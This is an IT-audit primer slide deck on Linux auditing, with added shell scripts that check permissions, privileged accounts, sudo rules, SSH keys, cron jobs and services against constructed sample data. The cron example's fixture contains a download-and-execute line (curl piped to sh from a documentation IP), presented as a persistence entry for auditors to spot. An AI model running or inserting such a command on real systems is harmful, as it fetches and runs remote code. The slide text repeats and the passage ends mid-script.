HOW TO AUDIT LINUX
A Practical and Easy Primer
ISACA Presentation – Minnesota Chapter
Gene Kartavtsev - CISA, PCIP
December 12, 2017
AGENDA
How do I
audit
Linux?
About Linux
What is Linux?
Linux Architecture
How does Linux do it?
Linux Audit
What is to audit in Linux?
ABOUT LINUX
What is Linux?
QUIZ: IS LINUX
• …an Operating System (OS)?
• …free?
• … more secure?
• …a penguin?
• …worth it?
• …a Unix?
IS LINUX AN OPERATING SYSTEM?
IS LINUX FREE?
IS LINUX MORE SECURE?
IS LINUX A PENGUIN?
IS LINUX WORTH IT?
IS LINUX A UNIX?
LINUX FACTS
• Linux is not an operating system on its own: it is the kernel. GNU/Linux is the
operating system, and it comes in over 300 distributions ("flavors").
• The Linux kernel was written by a 21-year-old Finnish college student, Linus
Torvalds, as a hobby project.
• Linux is 26 years old (first released in 1991).
• Linux runs on all 500 of the TOP500 supercomputers in the world (as of November 2017).
• The Android operating system is based on the Linux kernel.
• The Oscar-winning visual effects for James Cameron's Titanic were rendered on
Linux machines, and Avatar was developed entirely with 3D applications on the
Linux platform.
• Linux is everywhere…
PLACES LINUX IS RUNNING
USA
• U.S. Department of Defense
• U.S. Navy Submarine Fleet
• U.S. Postal Service
• U.S. Federal Courts
• Traffic control of San Francisco
• New York Stock Exchange
• Amazon, Google, Wikipedia
OTHER COUNTRIES
• The City of Munich, Germany
• French Parliament
• State-Owned Industrial and
Commercial Bank of China
• Government of Mexico City
• Czech Post
• Russian, Switzerland Schools
• German Universities
LINUX STANDARD BASE
The Linux Standard Base (LSB) is a joint project by several Linux distributions under the
organizational structure of the Linux Foundation to standardize the software system structure,
including the file system hierarchy used in the Linux operating system.
LINUX PROS AND CONS
PROS
• Easy to install
• It is free
• It is stable
• Intelligent architecture
• Many distributions available
• Security
CONS
• Not very "user friendly"
• No dedicated vendor support by default (paid support exists for
enterprise distributions)
• Might not support some hardware
• Desktop applications might not be available
• A learning curve is required
LINUX
ARCHITECTURE
How does Linux do it?
RUNLEVELS
A runlevel is one of the modes that a Unix-based operating system runs in.
Each runlevel has a defined set of services stopped or started, giving the administrator
control over the behavior of the machine. Conventionally, seven runlevels exist, numbered
from zero to six.
Runlevel | Mode | Action
0 | Halt | Shuts down the system
1 ("safe mode") | Single-user mode | Does not configure network interfaces, start daemons, or allow non-root logins
2 (often not used) | Multi-user mode | Does not configure network interfaces or start daemons
3 ("server") | Multi-user mode with networking | Starts the system normally
4 (often not used) | Undefined | Not used / user-definable
5 ("desktop") | X11 | As runlevel 3 plus a display manager (X): desktop environment
6 ("reboot") | Reboot | Reboots the system
init (short for initialization) is the program on Unix and Unix-like systems that spawns all
other processes. It runs as a daemon and has PID 1.
Example: init 6 reboots the machine.
The current runlevel is shown by runlevel (or who -r). On distributions that boot with
systemd (PID 1 is systemd rather than SysV init), runlevels are mapped to targets such as
multi-user.target (runlevel 3) and graphical.target (runlevel 5); systemctl get-default
shows the target the system boots into.
LINUX FILE SYSTEM
FHS classification of directories:
 | Shareable | Unshareable
Static | /usr, /opt | /etc, /boot
Variable | /var/mail, /var/spool/news | /var/run, /var/lock
FHS (Filesystem Hierarchy Standard) defines the directory structure and directory
contents in Linux distributions. It is maintained by the Linux Foundation. In the FHS,
all files and directories appear under the root directory, /.
LINUX FILE SYSTEM
Directory | Description | Windows equivalent
/ | File system root | C:\
/bin | Essential command binaries (executables) and shells (command prompt), used to bring the system up | C:\Windows\System32
/boot | Files necessary to boot the system (kernel, boot loader configuration) | ntldr, ntdetect.com, boot.ini
/dev | Device files through which programs talk to hardware (the drivers themselves live in the kernel) | C:\Windows\System32\drivers
/etc | Etc[etera]: critical system configuration files | *.ini files, the registry (regedit), C:\Windows\System32\drivers\etc
/home | Home directories for users | C:\Users
/lib | Essential shared libraries and kernel modules | *.dll, *.ocx files
/mnt | Mount point for mounting a file system temporarily, including remote file systems | D:\ (CD-ROM), Map Network Drive
/opt | Optional (add-on) application software packages | C:\Program Files\<Program Name>
/root | Home directory of the special user root (system administrator) | C:\Users\Administrator
/sbin | Essential system binaries, intended for root (system administrator) | .msc snap-ins, Microsoft Management Console
/tmp | Temporary files | %TEMP%
/usr | User binaries, including programs, games, documentation, etc. | C:\Program Files
/var | Variable data, e.g. mail, print jobs, logs | %AppData%, %SystemRoot%, C:\Windows\Logs, C:\Windows\System32\config (Event Viewer files)
PERMISSIONS - rwx rwx rwx
PERMISSION TYPES
r - read (4), w - write (2), x - execute (1); add the values to get one octal digit per class:
0 - --- (nothing)
1 - --x (x)
2 - -w- (w)
4 - r-- (r)
3 - -wx (w + x = 2 + 1)
5 - r-x (r + x = 4 + 1)
6 - rw- (r + w = 4 + 2)
7 - rwx (r + w + x = 4 + 2 + 1)
USERS & GROUPS
[---] owner, [---] group, [---] all users (others)
• owner - the owner permissions apply only to the owner of the file or
directory; they do not affect the actions of other users.
• group - the group permissions apply only to the group assigned to the
file or directory; they do not affect the actions of other users.
• all users - the "others" permissions apply to every other user on the
system; this is the permission group to watch the most.
ls -lah lists folder content in long format: -l long listing format, -a all files (including hidden ones), -h human-readable sizes.
Example: ls -lah /home/user
-rw------- 1 gene gene 2.4K Dec 10 22:03 .bash_history
WHO HAS PERMISSIONS TO DO WHAT?
Example: rw-r--r-- (octal 644): the owner can read and write, members of the group can read, and everyone else can read. Compare .bash_history above, rw------- (600): only the owner can read or write the command history.
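As an added example (not code from the original deck): a small POSIX shell script that converts a symbolic mode string like the one above into its octal value, then uses find to list the files an auditor watches most, world-writable files and setuid/setgid binaries. The only input is the directory you pass it; the sample tree it builds for a dry run is constructed test data, not a real system.

```shell
#!/bin/sh
# Added example, not code from the original deck. POSIX sh, awk, find, ls.

# mode_to_octal 'rwxr-x---' -> 0750
# mode_to_octal 'rwsr-xr-x' -> 4755  (first digit: setuid 4, setgid 2, sticky 1)
# Upper-case S/T mean the special bit is set but the execute bit is not.
mode_to_octal() {
  printf '%s\n' "$1" | awk '
    length($0) != 9 { print "mode string must be 9 characters" > "/dev/stderr"; exit 1 }
    {
      perm = 0; special = 0
      for (i = 1; i <= 9; i++) {
        c = substr($0, i, 1)
        perm = perm * 2
        if (c != "-" && c != "S" && c != "T") perm++
        if (c == "s" || c == "S") special += (i == 3) ? 4 : 2
        if (c == "t" || c == "T") special += 1
      }
      printf "%o%03o\n", special, perm
    }'
}

# find_risky DIR: regular files under DIR that are world-writable (o+w),
# setuid or setgid, printed as "<octal mode> <path>". -xdev stays on one
# file system so /proc, /sys and network mounts do not flood the report.
find_risky() {
  find "$1" -xdev -type f \( -perm -0002 -o -perm -4000 -o -perm -2000 \) \
    -print 2>/dev/null | sort |
  while IFS= read -r f; do
    # columns 2-10 of `ls -ld` are the nine permission characters
    printf '%s %s\n' "$(mode_to_octal "$(ls -ld "$f" | cut -c2-10)")" "$f"
  done
}

# make_sample_tree: constructed test data, one file per case. Prints the
# temporary directory it created; remove it when done.
make_sample_tree() {
  d=$(mktemp -d)
  for f in setuid_bin world_writable plain; do : > "$d/$f"; done
  chmod 4755 "$d/setuid_bin"
  chmod 0666 "$d/world_writable"
  chmod 0644 "$d/plain"
  printf '%s\n' "$d"
}

# Dry run: run this file with --demo.   Real use: find_risky /  (as root)
if [ "${1:-}" = "--demo" ]; then
  d=$(make_sample_tree)
  find_risky "$d"          # lists setuid_bin and world_writable, not plain
  rm -rf "$d"
fi
```

On a real host run find_risky as root so every directory is readable, and review each setuid binary against the package that shipped it; a setuid file in /tmp or a home directory has no legitimate reason to exist.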
ROOT AND SUDO
ROOT (su: substitute/switch user)
• Has unlimited privileges
• Has only one password
• Can damage the system without warning
• The username is always known to the bad guys
• Has only the super-user role
SUDO (super user do)
• Minimizes use of root privileges
• The root password is not shared or used
• Prompts for the invoking user's own password (cached for a
configurable timeout)
• Easier "undo", as it logs every command
• Easier admin role transfer
• Authentication timeout
su - switches to the root account (the "-" gives a full login shell)
su user switches to another user account;
su -c command user runs a single command as that user
sudo command prompts for the user's password and, if a sudoers rule
allows it, executes the command as root
The sudo command makes it easier to practice the principle
of least privilege
LINUX COMMANDS
Task | Linux | Windows
Information about the system | uname -a | winver
Current date and time | date | date /t, time /t
Clear screen | clear | cls
Compare files | diff | fc
Find a string in a file | grep | find, findstr
View a file | less | more
Display current location in the file system | pwd | cd (chdir)
List files in a directory | ls -la | dir
Find IP address | ifconfig (or ip addr on current systems) | ipconfig
See system information | lscpu | systeminfo
See file system usage | df -aTh | Disk Management, net use
See running processes | ps -ef | tasklist
See command description | whatis <command> | help
See environment variables | env | set
See which user is logged in | whoami | whoami
See network connections in use | netstat (or ss on current systems) | netstat
LINUX FUN
• Killing Daemons
• Avoiding Zombies
• Fortune Telling
• Finding Jokes
• Saying “Thank you !”
LINUX AUDIT
What is to audit in Linux?
LINUX – Know before the audit
• Linux is not going out of business
• Linux is an intelligent operating system
• Linux follows standards
• Linux administration is a culture
• Linux audit can be easily automated
LINUX AUDIT CHALLENGES
TOP 5 SYSADMIN'S COMPLAINTS ABOUT AUDIT
• You're vague: please do your homework before making a request
• You make urgent, last-minute requests: please let me know about
your request in advance
• You waste your sysadmin's time: please tell me everything you need
at once
• You abuse your rights: running an application as root isn't a fix
• You take your sysadmin for granted: no recognition when everything
works, but excessive blame when something fails
LINUX AUDIT - “Secrets”
• Develop a relationship with Linux admin before the
audit
• Establish credibility with Linux admin
• Communicate the Audit process
• Scope
• Timeline
• Deliverables
• Be current
• Don’t be afraid to be a geek
LINUX AUDIT OBJECTIVES
• Authorized User Access
• Authorized Services, Daemons, Modules
• Authorized Networking/Connections
• Authorized File Access
• Appropriate Logging
• Appropriate Security Parameters
• Authorized Applications
LINUX AUDIT - What should we look at?
/etc - Primary system configuration directory
/home/$USER - User data and user configuration
information
/var/log - Security logs, application logs, etc.
LINUX AUDIT - Basic system profiling
Linux distribution name and version
/etc/*-release (kernel version: uname -a)
Computer name
/etc/hostname (or the hostname command)
IP address(es)
/etc/hosts (static name-to-address mappings; the host's own addresses are only here if someone added them)
/var/lib/dhclient (DHCP lease files)
On a running system, ip addr (or ifconfig) shows the addresses actually configured.
LINUX AUDIT - User accounts
Basic user data
/etc/passwd
Group membership
/etc/group
Admin users
/etc/sudoers
/etc/passwd (UID 0 account has admin privileges)
LINUX AUDIT - User login history
User, time, login durations
/var/log/wtmp (binary; read it with the last command)
/var/log/btmp (failed logins; read it with lastb)
Other logs
/var/log/auth.log (Debian/Ubuntu) or /var/log/secure (Red Hat family): authentication, su and sudo events
/var/log/sudo.log (only if sudoers sets a logfile)
Commands
last, lastlog, lastb, w, who
LINUX AUDIT – No place like $HOME
User files
/home/<user>
/root
Important user files
$HOME/.* (hidden files/directories start with ".")
$HOME/.bash_history - command history (what the user actually ran)
$HOME/.ssh - remote access information: private keys, known_hosts, and authorized_keys (public keys that can log in as this user without a password)
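As an added example (not code from the original deck), the "authorized user access" checks from the root/sudo, user-accounts and $HOME/.ssh slides written as POSIX shell functions. Each takes the root of the tree to audit as its argument, so the same functions run against a live host (/, as root) or a mounted disk image. The sample tree they build for a dry run is constructed data; the account names, keys and addresses in it are invented for the example.

```shell
#!/bin/sh
# Added example, not code from the original deck. POSIX sh + awk.
# Every function takes ROOT, the tree to audit: "/" on a live host (run as
# root so the files are readable) or the mount point of a disk image.

# uid0_accounts ROOT: any account with UID 0 is root, whatever its name.
# Prints "name shell"; the only expected line is root.
uid0_accounts() {
  awk -F: '$3 == 0 { print $1, $7 }' "$1/etc/passwd"
}

# interactive_accounts ROOT: accounts whose shell allows a login. Service
# accounts (nologin, false) are filtered out; what remains needs an owner.
interactive_accounts() {
  awk -F: '$7 !~ /(nologin|false)$/ { print $1 }' "$1/etc/passwd"
}

# sudo_grants ROOT: grant lines from /etc/sudoers and /etc/sudoers.d/*, with
# comments, Defaults and alias definitions removed. A command list of ALL is
# tagged [ALL]; a rule needing no password is tagged [NOPASSWD]. Both tags
# on one line means "root without a password".
sudo_grants() {
  root=$1
  for f in "$root/etc/sudoers" "$root"/etc/sudoers.d/*; do
    [ -f "$f" ] || continue
    awk -v file="${f#$root}" '
      /^[ \t]*(#|$)/ { next }
      /^[ \t]*(Defaults|User_Alias|Cmnd_Alias|Host_Alias|Runas_Alias)/ { next }
      {
        tag = ""
        if ($0 ~ /[ \t:)]ALL[ \t]*$/) tag = tag " [ALL]"
        if ($0 ~ /NOPASSWD/)          tag = tag " [NOPASSWD]"
        print file ": " $0 tag
      }' "$f"
  done
}

# ssh_keys ROOT: every authorized_keys entry per account, with the file's
# permissions. Each key is a password-less login credential and must map to
# a known person or system. Key material is shortened for the report.
ssh_keys() {
  awk -F: '$6 != "" { print $1, $6 }' "$1/etc/passwd" |
  while read -r user home; do
    ak="$1$home/.ssh/authorized_keys"
    [ -f "$ak" ] || continue
    awk -v u="$user" -v m="$(ls -ld "$ak" | cut -c2-10)" '
      /^[ \t]*#/ || NF == 0 { next }
      { for (i = 1; i <= NF; i++) if ($i ~ /^AAAA/) $i = substr($i, 1, 12) "..."
        print u, m, $0 }' "$ak"
  done
}

audit_users() {
  echo "== UID 0 accounts ==";        uid0_accounts "$1"
  echo "== Interactive accounts ==";  interactive_accounts "$1"
  echo "== sudo grants ==";           sudo_grants "$1"
  echo "== SSH authorized keys ==";   ssh_keys "$1"
}

# make_sample_root: constructed test data (names, keys, addresses invented).
# Prints the temporary root it created.
make_sample_root() {
  r=$(mktemp -d)
  mkdir -p "$r/etc/sudoers.d" "$r/home/gene/.ssh" "$r/home/backup/.ssh"
  cat > "$r/etc/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
toor:x:0:0:second root:/root:/bin/sh
gene:x:1000:1000:Gene:/home/gene:/bin/bash
backup:x:1001:1001:Backup:/home/backup:/usr/sbin/nologin
EOF
  cat > "$r/etc/sudoers" <<'EOF'
Defaults env_reset
root   ALL=(ALL:ALL) ALL
%wheel ALL=(ALL) ALL
#includedir /etc/sudoers.d
EOF
  cat > "$r/etc/sudoers.d/90-gene" <<'EOF'
gene   ALL=(ALL) NOPASSWD: ALL
backup ALL=(root) /usr/bin/rsync
EOF
  cat > "$r/home/gene/.ssh/authorized_keys" <<'EOF'
# laptop key
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGQ2sample gene@laptop
EOF
  cat > "$r/home/backup/.ssh/authorized_keys" <<'EOF'
from="10.0.0.5",command="/usr/bin/rsync --server" ssh-rsa AAAAB3NzaC1yc2EAAAAsample backup@nas
EOF
  chmod 600 "$r/home/gene/.ssh/authorized_keys"
  chmod 644 "$r/home/backup/.ssh/authorized_keys"
  printf '%s\n' "$r"
}

# Dry run: run this file with --demo.   Real use: audit_users /
if [ "${1:-}" = "--demo" ]; then
  r=$(make_sample_root); audit_users "$r"; rm -rf "$r"
fi
```

In the dry run the report shows the three findings the slides describe: a second UID 0 account (toor), a sudoers.d rule granting gene root without a password, and a backup key that is restricted with from= and command= while gene's is not.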
LINUX AUDIT – Daemons, services
Start-up scripts
/etc/inittab, /etc/init.d, /etc/rc.d (SysV init)
/etc/init/*.conf (Upstart)
/etc/systemd/system, /lib/systemd/system (systemd; systemctl list-unit-files --state=enabled)
Scheduled tasks
/etc/cron*
/var/spool/cron/*
Commands
ps -ef, ps aux
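As an added example (not code from the original deck), the start-up and scheduled-task locations from the slide above read as POSIX shell functions that take the root of the tree to audit, so they work on a live host (/) or a mounted image. The crontab lines and service links in the sample tree are constructed for the dry run; the curl | sh job in it is there only to show what a persistence entry looks like in the report, and 203.0.113.9 is a documentation address.

```shell
#!/bin/sh
# Added example, not code from the original deck. POSIX sh + awk.
# ROOT is "/" on a live host or the mount point of a disk image.

# cron_entries FILE SRC USER: print "SRC user [schedule] command" for each
# active line of one crontab. USER empty means a system crontab, where the
# user is the sixth field; otherwise it is a per-user spool file.
cron_entries() {
  awk -v src="$2" -v user="$3" '
    /^[ \t]*(#|$)/ || /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }  # comments, VAR=
    {
      n = ($1 ~ /^@/) ? 1 : 5               # @reboot/@daily or five time fields
      u = user; first = n + 1
      if (u == "") { u = $(n + 1); first = n + 2 }
      sched = $1; for (i = 2; i <= n; i++) sched = sched " " $i
      cmd = $first; for (i = first + 1; i <= NF; i++) cmd = cmd " " $i
      print src, u, "[" sched "]", cmd
    }' "$1"
}

# cron_jobs ROOT: every crontab location the slide lists (/etc/cron*,
# /var/spool/cron/*), so a job hidden in cron.d or a user spool is seen.
cron_jobs() {
  root=$1
  for f in "$root/etc/crontab" "$root"/etc/cron.d/*; do
    [ -f "$f" ] || continue
    cron_entries "$f" "${f#$root}" ""
  done
  for f in "$root"/var/spool/cron/crontabs/* "$root"/var/spool/cron/*; do
    [ -f "$f" ] || continue
    cron_entries "$f" "${f#$root}" "${f##*/}"
  done
}

# cron_scripts ROOT: scripts dropped into /etc/cron.{hourly,daily,weekly,
# monthly}; run-parts executes them as root, so each one needs an owner.
cron_scripts() {
  root=$1
  for f in "$root"/etc/cron.hourly/* "$root"/etc/cron.daily/* \
           "$root"/etc/cron.weekly/* "$root"/etc/cron.monthly/*; do
    [ -f "$f" ] && printf '%s\n' "${f#$root}"
  done
  return 0
}

# enabled_services ROOT: what starts at boot, from the on-disk state of both
# init systems: SysV "S" links in /etc/rc[2-5].d and systemd symlinks in
# /etc/systemd/system/*.wants/. On a live systemd host,
# `systemctl list-unit-files --state=enabled` is the authoritative list.
enabled_services() {
  root=$1
  for f in "$root"/etc/rc[2-5].d/S* "$root"/etc/systemd/system/*.wants/*; do
    [ -L "$f" ] || [ -e "$f" ] || continue
    printf '%s -> %s\n' "${f#$root}" "$(readlink "$f" || printf '%s' '(not a link)')"
  done
}

audit_startup() {
  echo "== cron jobs ==";         cron_jobs "$1"
  echo "== cron.* scripts ==";    cron_scripts "$1"
  echo "== enabled services =="; enabled_services "$1"
}

# make_sample_root: constructed test data. The www-data job has the shape of
# a persistence entry an auditor is looking for (203.0.113.9 is a
# documentation address, not a real host).
make_sample_root() {
  r=$(mktemp -d)
  mkdir -p "$r/etc/cron.d" "$r/etc/cron.daily" "$r/var/spool/cron/crontabs" \
           "$r/etc/rc3.d" "$r/etc/systemd/system/multi-user.target.wants"
  cat > "$r/etc/crontab" <<'EOF'
SHELL=/bin/sh
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
EOF
  printf '@daily backup /usr/bin/rsync -a /srv /mnt/backup\n' > "$r/etc/cron.d/backup"
  printf '*/5 * * * * curl -s http://203.0.113.9/u.sh | sh\n' > "$r/var/spool/cron/crontabs/www-data"
  : > "$r/etc/cron.daily/logrotate"
  ln -s ../init.d/nginx "$r/etc/rc3.d/S20nginx"
  ln -s /lib/systemd/system/sshd.service \
        "$r/etc/systemd/system/multi-user.target.wants/sshd.service"
  printf '%s\n' "$r"
}

# Dry run: run this file with --demo.   Real use: audit_startup /
if [ "${1:-}" = "--demo" ]; then
  r=$(make_sample_root); audit_startup "$r"; rm -rf "$r"
fi
```

Every line of the cron report carries its source file and the user it runs as, which is what you need to ask the admin "who owns this job and why does it run as that account"; the www-data entry in the dry run is the kind of line that ends the conversation quickly.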
RESOURCES TO LEARN LINUX
GENERAL
• LinuxCommand.org
• The Linux System Administrator's
Guide
• GNU Operating System
• More… 12 Resources to Learn
Linux
SECURITY AND AUDIT
• SANS Pen Testing
• LinuxSecurity.com
• Linux-Audit.com
• Linuxtopia.org
QUESTIONS?
ABOUT SPEAKER
Gene Kartavtsev, CISA, PCIP
Gene has 20 years of Information Technology experience, which includes IT audit, security,
architecture, engineering and support.
Prior to focusing on IT Governance, Risk and Compliance, Gene worked at several global financial
services and Media companies, including Bloomberg L.P and Thomson Reuters, where he sharpened
his skills in information systems engineering and architecture. He participated in thousands of
complex IT implementations and was often involved in solving technology challenges vital to the
success of the core business.
In 2012, while working at JetBlue on a PCI controls implementation project, Gene discovered the
interesting world of IT compliance.
Later, after moving from New York to Minnesota Gene followed his passion in IT Risk Management
and Compliance and has held several roles that have required a combination of technical expertise
and knowledge of the latest IT regulations. Gene has rounded out his practical knowledge with
CISA, PCIP, and ISA certifications.
Gene recently joined Express Scripts, where he enjoys working with the challenges of applying
multiple IT regulatory standards to many areas of large company operations.
Other interests include spending time with the family, traveling and bicycle randonneuring - a long-
distance, unsupported, noncompetitive cycling within prescribed time limits.
LinkedIn: https://www.linkedin.com/in/gkartavtsev
Email: gkartavtsev@gmail.com
  • 12. PLACES LINUX IS RUNNING USA • U.S. Department of Defense • U.S. Navy Submarine Fleet • U.S. Postal Service • U.S. Federal Courts • Traffic control of San Francisco • New York Stock Exchange • Amazon, Google, Wikipedia OTHER COUNTRIES • The City of Munich, Germany • French Parliament • State-Owned Industrial and Commercial Bank of China • Government of Mexico City • Czech Post • Russian, Switzerland Schools • German Universities
  • 13. LINUX STANDARD BASE The Linux Standard Base (LSB) is a joint project by several Linux distributions under the organizational structure of the Linux Foundation to standardize the software system structure, including the file system hierarchy used in the Linux operating system.
  • 14. LINUX PROS AND CONS
    PROS
    • Easy to install
    • It is free
    • It is stable
    • Intelligent architecture
    • Many distributions available
    • Security
    CONS
    • Not too “user friendly”
    • Does not have dedicated support
    • Might not support some hardware
    • Desktop applications might not be available
    • Learning curve is required
  • 16. RUNLEVELS
    A runlevel is one of the modes that a Unix-based operating system will run in. Each runlevel has a certain number of services stopped or started, giving the user control over the behavior of the machine. Conventionally, seven runlevels exist, numbered from zero to six.
    Runlevel | Mode | Action
    0 | Halt | Shuts down the system
    1 – “safe mode” | Single-User Mode | Does not configure network interfaces, start daemons, or allow non-root logins
    2 – “often not used” | Multi-User Mode | Does not configure network interfaces or start daemons
    3 – “server” | Multi-User Mode with Networking | Starts the system normally
    4 – “often not used” | Undefined | Not used / user-definable
    5 – “desktop” | X11 | As runlevel 3 + display manager (X) – desktop environment
    6 – “reboot” | Reboot | Reboots the system
    Init (short for initialization) is the program on Unix and Unix-like systems that spawns all other processes. It runs as a daemon and typically has PID 1.
    Example: init 6 – will reboot the machine
  • 17. LINUX FILE SYSTEM
    | Shareable | Unshareable
    Static | /usr, /opt | /etc, /boot
    Variable | /var/mail, /var/spool/news | /var/run, /var/lock
    FHS – Filesystem Hierarchy Standard – defines the directory structure and directory contents in Linux distributions. It is maintained by the Linux Foundation. In the FHS, all files and directories appear under the root directory /
  • 18. LINUX FILE SYSTEM
    Directory | Description | Windows equivalent
    / | File structure root | C:\
    bin | System command binaries (executables) and shells (command prompt). Used to bring the system up | C:\Windows\System32
    boot | Files necessary to boot the system | ntldr, ntdetect.com, boot.ini
    dev | Files that communicate with hardware (device drivers) | C:\Windows\System32\Drivers
    etc | Etc[etera] – critical system configuration files (*.ini, registry) | C:\Windows\System32\Drivers, regedit
    home | Home directories for users | C:\Users
    lib | Essential shared libraries and kernel modules | *.dll, *.ocx files
    mnt | Mount point for mounting a file system temporarily. It can be used for a remotely located file system | D:\CDROM, server Map Network Drive
    opt | Optional application software packages | C:\Windows\Program Files\"Program Name" (e.g. Fonts)
    root | Home directory for the special user root (system administrator) | C:\Users\Administrator
    sbin | Essential system binaries only for root (system administrator) | .msc, Microsoft Management Console
    tmp | Temporary files | %TEMP%
    usr | User binaries, including programs, games, etc. | C:\Program Files
    var | Variable data, e.g. email, print jobs, logs, etc. | %AppData%, %SystemRoot%, C:\Windows\Logs, C:\Windows\System32\config (Event Viewer files)
  • 19. PERMISSIONS
    - rwx rwx rwx
    PERMISSION TYPES: R – Read (4), W – Write (2), X – Execute (1)
    • 0 – nothing
    • 1 – x
    • 2 – w
    • 4 – r
    • 3 – wx = 1+2
    • 5 – rx = 4+1
    • 6 – rw = 4+2
    • 7 – rwx = 4+2+1
    USERS & GROUPS: [---] – Owner, [---] – Group, [---] – All users
    • owner – The Owner permissions apply only to the owner of the file or directory; they will not impact the actions of other users.
    • group – The Group permissions apply only to the group that has been assigned to the file or directory; they will not affect the actions of other users.
    • all users – The All Users permissions apply to all other users on the system; this is the permission group that you want to watch the most.
    ls -lah lists folder content in long format: -l – long listing format, -a – all files, -h – human-readable
    Example: ls -lah /home/user
    -rw------- 1 gene gene 2.4K Dec 10 22:03 .bash_history
  • 20. WHO HAS PERMISSIONS TO DO WHAT?
    Example: rw-r--r-- (owner: read and write; group: read; all users: read)
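As an added example (not from the slides): a small POSIX shell decoder for the mode strings of slides 19 and 20, turning the rwx triplets that ls -l prints into the octal values from the table and a "who can do what" summary, and flagging the all-users write bit the slide says to watch most closely. The function names are my own.

```shell
# Added example, not from the slides: decode an ls -l mode string such as
# "rw-r--r--" (or "-rw-r--r--" with its leading file-type character).
# triplet_value "rw-" -> 6   (r=4, w=2, x=1, as on the slide)
triplet_value() {
    v=0
    case $1 in r??) v=$((v + 4)) ;; esac
    case $1 in ?w?) v=$((v + 2)) ;; esac
    case $1 in ??x) v=$((v + 1)) ;; esac
    printf '%s' "$v"
}

# triplet_words "rw-" -> "read, write"; "---" -> "nothing"
triplet_words() {
    w=""
    case $1 in r??) w="read" ;; esac
    case $1 in ?w?) w="${w:+$w, }write" ;; esac
    case $1 in ??x) w="${w:+$w, }execute" ;; esac
    printf '%s' "${w:-nothing}"
}

# split_mode MODE: sets $owner, $group, $others from a 9- or 10-char string
split_mode() {
    perm=$1
    [ ${#perm} -eq 10 ] && perm=${perm#?}   # drop the file-type character
    [ ${#perm} -eq 9 ] || { printf 'bad mode string: %s\n' "$1" >&2; return 1; }
    owner=${perm%??????}; rest=${perm#???}     # first three / remaining six
    group=${rest%???}; others=${rest#???}
}

# mode_to_octal "rw-r--r--" -> 644
mode_to_octal() {
    split_mode "$1" || return 1
    printf '%s%s%s\n' "$(triplet_value "$owner")" \
        "$(triplet_value "$group")" "$(triplet_value "$others")"
}

# who_can "rw-r--r--": one line per class, the slide's "who can do what"
who_can() {
    split_mode "$1" || return 1
    printf 'owner: %s\n' "$(triplet_words "$owner")"
    printf 'group: %s\n' "$(triplet_words "$group")"
    printf 'all users: %s\n' "$(triplet_words "$others")"
}

# world_writable MODE: true when "all users" may write (the group to watch)
world_writable() {
    split_mode "$1" || return 1
    case $others in ?w?) return 0 ;; *) return 1 ;; esac
}
mode_to_octal -rw-------    # the slide's .bash_history line: 600
```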
  • 21. ROOT AND SUDO
    ROOT (SU – SUPER [SWITCH] USER)
    • Has unlimited privileges
    • Has only one password
    • Can damage the system without warning
    • Username is always known to bad guys
    • Has only the super user role
    SUDO (SUPER USER DO)
    • Minimizes root privileges
    • Root password is not shared or used
    • Prompts for password for every major step
    • Easier “undo” as it logs every step
    • Easier admin role transfer
    • Authentication timeout
    su - – switches to the root account
    su user – switches to a user account; su user -c command – runs a command as that user
    sudo command – prompts for the user’s password and confirms a request to execute a command
    The sudo command makes it easier to practice the principle of least privilege
  • 22. LINUX COMMANDS
    Task | Linux | Windows
    Information about system | uname -a | winver
    Current date and time | date | date /t, time /t
    Clear screen | clear | cls
    Compare files | diff | fc
    Find a string in a file | grep | find
    View a file | less | more
    Display location in a file system | pwd | chdir
    List files in a directory | ls -la | dir
    Find IP | ifconfig | ipconfig
    See system information | lscpu | systeminfo
    See file system usage | df -aTh | Disk Manager, net use
    See running processes | ps -ef | tasklist
    See command description | whatis <command> | help
    See environmental variables | env | set
    See what user is logged in | whoami | whoami
    See network protocols in use | netstat | netstat
  • 23. LINUX FUN
    • Killing Daemons
    • Avoiding Zombies
    • Fortune Telling
    • Finding Jokes
    • Saying “Thank you!”
  • 24. LINUX AUDIT
    What is to audit in Linux?
  • 25. LINUX – Know before the audit
    • Linux is not going out of business
    • Linux is an intelligent Operating System
    • Linux follows standards
    • Linux administration is a culture
    • Linux audit can be easily automated
  • 26. LINUX AUDIT CHALLENGES
    TOP 5 SYSADMIN’S COMPLAINTS ABOUT AUDIT
    • You're vague: Please do your homework before making a request
    • You make urgent, last-minute requests: Please let me know about your request in advance
    • You waste your sysadmin's time: Please let me know about everything you need at once
    • You abuse your rights: Running an application as root isn't a fix
    • You take your sysadmin for granted: Not getting the slightest recognition when everything works, but being excessively blamed when something fails
  • 27. LINUX AUDIT - “Secrets”
    • Develop a relationship with the Linux admin before the audit
    • Establish credibility with the Linux admin
    • Communicate the audit process
      • Scope
      • Timeline
      • Deliverables
    • Be current
    • Don’t be afraid to be a geek
  • 28. LINUX AUDIT OBJECTIVES
    • Authorized User Access
    • Authorized Services, Daemons, Modules
    • Authorized Networking/Connections
    • Authorized File Access
    • Appropriate Logging
    • Appropriate Security Parameters
    • Authorized Applications
  • 29. LINUX AUDIT - What should we look at?
    • /etc - Primary system configuration directory
    • /home/$USER - User data and user configuration information
    • /var/log - Security logs, application logs, etc.
  • 30. LINUX AUDIT - Basic system profiling
    • Linux distribution name and version: /etc/*-release
    • Computer name: /etc/hostname
    • IP Address(es): /etc/hosts, /var/lib/dhclient
  • 31. LINUX AUDIT - User accounts
    • Basic user data: /etc/passwd
    • Group membership: /etc/group
    • Admin users: /etc/sudoers, /etc/passwd (a UID 0 account has admin privileges)
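As an added example (not from the slides): shell checks for the user-account items on slide 31, run over constructed copies of /etc/passwd, /etc/group and /etc/sudoers so the script works offline. The sample accounts, the sudo group name and the function names are my own; on a real host the functions are pointed at the real files instead.

```shell
# Added example, not from the slides; the sample files below are constructed.
SAMPLE=${TMPDIR:-/tmp}/linux-audit-sample.$$
mkdir -p "$SAMPLE"
trap 'rm -rf "$SAMPLE"' EXIT
cat > "$SAMPLE/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
gene:x:1000:1000:Gene:/home/gene:/bin/bash
backup2:x:0:0:second UID-0 account:/home/backup2:/bin/sh
EOF
cat > "$SAMPLE/group" <<'EOF'
root:x:0:
sudo:x:27:gene,svc-deploy
EOF
cat > "$SAMPLE/sudoers" <<'EOF'
# constructed /etc/sudoers
Defaults env_reset
root ALL=(ALL:ALL) ALL
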